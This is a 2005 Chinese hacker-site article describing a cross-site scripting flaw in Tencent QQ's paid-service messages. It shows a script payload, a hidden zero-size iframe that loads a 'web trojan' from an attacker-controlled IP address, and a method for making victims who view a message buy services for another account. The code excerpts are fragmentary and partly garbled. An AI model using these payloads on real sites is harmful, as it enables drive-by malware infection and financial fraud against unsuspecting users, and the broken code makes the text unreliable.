|
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
|
|
||||||||
|
||||||||
|
|||||
| QQ业务跨站漏洞初步研究 | |||||
作者:fhod 文章来源:fhods Blog 点击数: 更新时间:2005-9-21 ![]() |
|||||
|
这阶段跨站闹的很凶..QQ也接连出了几个跨站漏洞..这不.QQ业务也出了跨站漏洞..经过测试 ..又为我们带来了一经典之作.. 的...这个危害比那个还要大...如果你的QQ币足够支付的话.
这里我们的留言很明显就被对方看到了..所以我们在留言的时候最好在前 面写一段话....然后后面在写<script>alert('fhod');</script> 然后对方查看的时候就会在浏览器上弹出一个内容为"fhod"的对话框.图2
那我们能不能利用它来做些什么呢?其实这个漏洞是完全可以让对方给你购买服务的..前提是只要对方查看了.. 不过我对脚本不是很懂,.所以没做深入研究..我想只要把玄猫的那个看懂了..就可以举一反三..彻底的利用这 个漏洞.. 我简单说下我怎么做的把 然后查看接受的代码就成了 <td>QQ炫铃服务费用:</td> class="border" value="1" onfocus="javascript:SetFee_give();"> maxlength="3" style="border:#ffffff 1px solid">Q币</td> 月数。</font></td></tr> 他的留言:</font>试下这个<iframe src</td> 而用 就完全可以执行成功....然后我们可以在kz1.htm里写这么一段代码 <iframe src=http://218.xx.xx.xxx/kz.htm width=0 height=0></iframe> <script>window.opener=top; window.close();</script> 上面那个http://218.xx.xx.xxx/kz.htm 是我们的网页木马地址/..具体什么马视个人需要而定 <script>window.opener=top; window.close();</script> 或者在一个HTM页面写如以下代码 上面代码意思是给1988415这个号购买一个月的服务..留言是123在网上看到的以前老方法..自己试了下出现登陆的页面...可能腾讯已经修改了这个漏洞把..有兴趣可以试下. 我暂时就研究这么多.这几天累死了....抽空继续研究下..先发出来..大家有兴趣的欢迎继续研究..有了成果记的与我分享!! |
|||||
| 文章录入:IceRiver 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 消除局域网内使用QQ后带来的 对最新QQ医生 1.4版杀毒方式 QQ拼音输入法截图展示 当心QQ通行证偷你密码 瑞星安 QQ通行证木马通过伪装的页面 快报!腾讯QQ 2008版将在半年 网上现窃取QQ群号大盗 用户应 机构数据: QQ市场占有率为M 腾讯将在下周公测TM2008 QQ2 抢先看!QQ2008+TM2008功能最 |
网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
| » CnXHacker.CoM | © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |